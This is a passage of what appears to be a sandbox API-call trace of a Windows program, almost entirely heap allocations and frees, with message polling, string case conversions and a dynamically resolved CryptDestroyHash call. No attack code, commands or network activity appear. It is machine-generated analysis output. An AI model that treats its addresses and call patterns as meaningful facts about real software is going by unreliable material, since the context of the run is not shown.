[0087.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0087.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f28 [0087.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0087.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f28 | out: hHeap=0x2af0000) returned 1 [0087.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c40 | out: hHeap=0x2af0000) returned 1 [0087.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cd0 | out: hHeap=0x2af0000) returned 1 [0087.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0087.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0087.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7000 | out: hHeap=0x2af0000) returned 1 [0087.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0087.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0087.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e680 [0087.065] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e680 | out: hHeap=0x2af0000) returned 1 [0087.065] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0087.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e50 [0087.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d00 [0087.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0087.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e08 [0087.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0087.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e08 | out: hHeap=0x2af0000) returned 1 [0087.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d00 | out: hHeap=0x2af0000) returned 1 [0087.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e50 | out: hHeap=0x2af0000) returned 1 [0087.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0087.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0087.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0087.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0087.066] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0087.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0087.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0087.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0087.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0087.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0087.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0087.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0087.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0087.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0087.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0087.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0087.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0087.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0087.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0087.066] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0087.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0087.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed00 | out: hHeap=0x2af0000) returned 1 [0087.066] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0087.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0087.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7200 [0087.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0087.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0087.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0087.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0087.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0087.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0087.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0087.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0087.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7200 | out: hHeap=0x2af0000) returned 1 [0087.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0087.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0087.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0087.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9af0 [0087.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9be0 [0087.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa99a0 [0087.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0087.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a00 [0087.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0087.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0087.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9bb0 [0087.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9940 [0087.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa99b8 [0087.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0087.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9c10 [0087.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0087.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d50 | out: hHeap=0x2af0000) returned 1 [0087.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a30 [0087.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0087.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9ad8 [0087.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9b50 [0087.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ef8 [0087.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9da8 [0087.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9dc0 [0087.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e50 [0087.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9d78 [0087.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9cb8 [0087.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d90 [0087.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9df0 [0087.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0087.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0087.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0087.068] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0087.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0087.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0087.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9cd0 [0087.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73c98 [0087.068] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0087.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0087.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0087.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d48 [0087.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ec8 [0087.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0087.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d00 [0087.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0087.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0087.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0087.068] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0087.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d50 | out: hHeap=0x2af0000) returned 1 [0087.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0087.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d00 | out: hHeap=0x2af0000) returned 1 [0087.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ec8 | out: hHeap=0x2af0000) returned 1 [0087.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d48 | out: hHeap=0x2af0000) returned 1 [0087.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0087.069] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0087.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0087.069] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0087.069] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0087.069] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0087.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0087.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0087.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d00 [0087.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d30 [0087.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0087.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9dd8 [0087.069] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0087.069] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dd8 | out: hHeap=0x2af0000) returned 1 [0087.069] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d30 | out: hHeap=0x2af0000) returned 1 [0087.069] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d00 | out: hHeap=0x2af0000) returned 1 [0087.069] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0087.069] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0087.069] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73c98 | out: hHeap=0x2af0000) returned 1 [0087.069] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cd0 | out: hHeap=0x2af0000) returned 1 [0087.069] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0087.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d00 [0087.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0087.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d30 [0087.069] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0087.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c58 [0087.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0087.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ec8 [0087.069] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0087.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9cd0 [0087.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0087.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e38 [0087.070] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0087.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0087.070] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d90 | out: hHeap=0x2af0000) returned 1 [0087.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d48 [0087.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0087.070] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0087.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0087.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e98 [0087.070] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0087.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e68 [0087.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0087.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0087.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d60 [0087.070] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e68 | out: hHeap=0x2af0000) returned 1 [0087.070] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0087.070] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0087.070] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0087.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9dd8 [0087.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0087.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f10 [0087.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0087.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0087.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d60 [0087.070] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f10 | out: hHeap=0x2af0000) returned 1 [0087.070] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0087.070] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0087.070] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0087.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e68 [0087.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0087.071] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0087.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x11) returned 0x29f6f20 [0087.071] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f6f20, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0087.071] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e68 | out: hHeap=0x2af0000) returned 1 [0087.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0087.071] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f20 | out: hHeap=0x2af0000) returned 1 [0087.071] GetProcAddress (hModule=0x76390000, lpProcName="CryptDestroyHash") returned 0x763af0e0 [0087.071] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77aa8 | out: hHeap=0x2af0000) returned 1 [0087.071] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0087.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e08 [0087.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0087.071] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0087.071] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e08 | out: hHeap=0x2af0000) returned 1 [0087.071] CryptDestroyHash (hHash=0x9a3b40) returned 1 [0087.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2a74958 [0087.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0087.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0087.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f10 [0087.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f28 [0087.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ee0 [0087.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0087.071] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ee0 | out: hHeap=0x2af0000) returned 1 [0087.071] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0087.071] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f28 | out: hHeap=0x2af0000) returned 1 [0087.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d60 [0087.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e68 [0087.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e20 [0087.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0087.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e20 | out: hHeap=0x2af0000) returned 1 [0087.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0087.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e68 | out: hHeap=0x2af0000) returned 1 [0087.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0087.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dd8 | out: hHeap=0x2af0000) returned 1 [0087.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e98 | out: hHeap=0x2af0000) returned 1 [0087.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0087.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9df0 | out: hHeap=0x2af0000) returned 1 [0087.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d30 | out: hHeap=0x2af0000) returned 1 [0087.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d00 | out: hHeap=0x2af0000) returned 1 [0087.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ec8 | out: hHeap=0x2af0000) returned 1 [0087.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c58 | out: hHeap=0x2af0000) returned 1 [0087.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e38 | out: hHeap=0x2af0000) returned 1 [0087.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cd0 | out: hHeap=0x2af0000) returned 1 [0087.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d48 | out: hHeap=0x2af0000) returned 1 [0087.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0087.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f10 | out: hHeap=0x2af0000) returned 1 [0087.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0087.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0087.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0087.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74958 | out: hHeap=0x2af0000) returned 1 [0087.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0087.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0087.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0087.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0087.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, 